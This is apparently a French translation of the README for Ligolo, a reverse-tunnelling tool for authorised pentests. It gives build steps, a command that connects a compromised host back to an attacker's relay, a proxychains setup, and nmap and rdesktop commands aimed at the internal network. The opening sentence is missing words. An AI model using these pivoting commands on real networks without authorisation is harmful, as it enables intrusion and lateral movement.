
Tunnel inversé simplifié pour les pentesters, par les pentesters https://sysdream.com/

est un outil et pour établir des tunnels ou depuis une connexion inversée en toute sécurité (certificat TLS à courbe elliptique).
Il est comparable à Meterpreter avec Autoroute + Socks4a, mais plus stable et plus rapide.
Vous avez compromis un serveur Windows / Linux / Mac lors de votre audit externe. Ce serveur se trouve à l'intérieur d'un réseau local et vous souhaitez établir des connexions vers d'autres machines sur ce réseau.
Ligolo peut configurer un tunnel pour accéder aux ressources du serveur interne.
Relais d'une connexion RDP via Proxychains (WAN).

Voici une capture d'écran d'un test de vitesse entre deux hôtes 100 mb/s (ligolo / localrelay). Les performances peuvent varier selon la configuration système et réseau.

Assurez-vous que Go est installé et fonctionne.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
NOTE : Vous pouvez également utiliser vos propres certificats en utilisant l'option TLS_CERT de make lors de l'appel de build. Exemple : make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo se compose de deux modules :
Localrelay est destiné à être lancé sur le serveur de contrôle (le serveur de l'attaquant).
Ligolo est le programme à exécuter sur la machine cible.
Pour localrelay, vous pouvez laisser les options par défaut. Il écoute sur toutes les interfaces sur le port 5555 et attend les connexions de ligolo (paramètre -relayserver).
Pour ligolo, vous devez spécifier l'adresse IP du serveur relais (ou de votre serveur d'attaque) à l'aide du paramètre -relayserver ip:port.
Vous pouvez utiliser l'option -h pour obtenir de l'aide.
Une fois la connexion établie entre Ligolo et LocalRelay, un proxy SOCKS5 sera mis en place sur le port TCP 1080 sur le serveur relais (vous pouvez changer l'adresse/port TCP à l'aide de l'option -localserver).
Ensuite, il vous suffit d'utiliser votre outil préféré (Proxychains par exemple) et d'explorer le réseau local du client.
Sur votre serveur d'attaque.
./bin/localrelay_linux_amd64
Sur l'hôte compromis.
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
Une fois la connexion établie, définissez les paramètres suivants dans le fichier de configuration de ProxyChains (sur le serveur d'attaque) :
[ProxyList]
# ajouter un proxy ici ...
# en attendant
# les valeurs par défaut sont réglées sur "tor"
socks5 127.0.0.1 1080
Profitez.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Options de Localrelay :
Usage of localrelay:
-certfile string
Le certificat serveur TLS (par défaut "certs/server.crt")
-keyfile string
La clé serveur TLS (par défaut "certs/server.key")
-localserver string
L'adresse du serveur local (votre paramètre proxychains) (par défaut "127.0.0.1:1080")
-relayserver string
L'adresse d'écoute du serveur relais (l'adresse de connexion retour) (par défaut "0.0.0.0:5555")
Options de Ligolo :
Usage of ligolo:
-autorestart
Tenter de se reconnecter en cas d'exception
-relayserver string
Le serveur relais (l'adresse de connexion retour) (par défaut "127.0.0.1:5555")
-skipverify
Ignorer la vérification de l'épinglage du certificat TLS
-targetserver string
Le serveur de destination (un client RDP, serveur SSH, etc.) - lorsqu'il n'est pas spécifié, Ligolo démarre un serveur proxy socks5
GNU General Public License v3.0 (Voir LICENSING).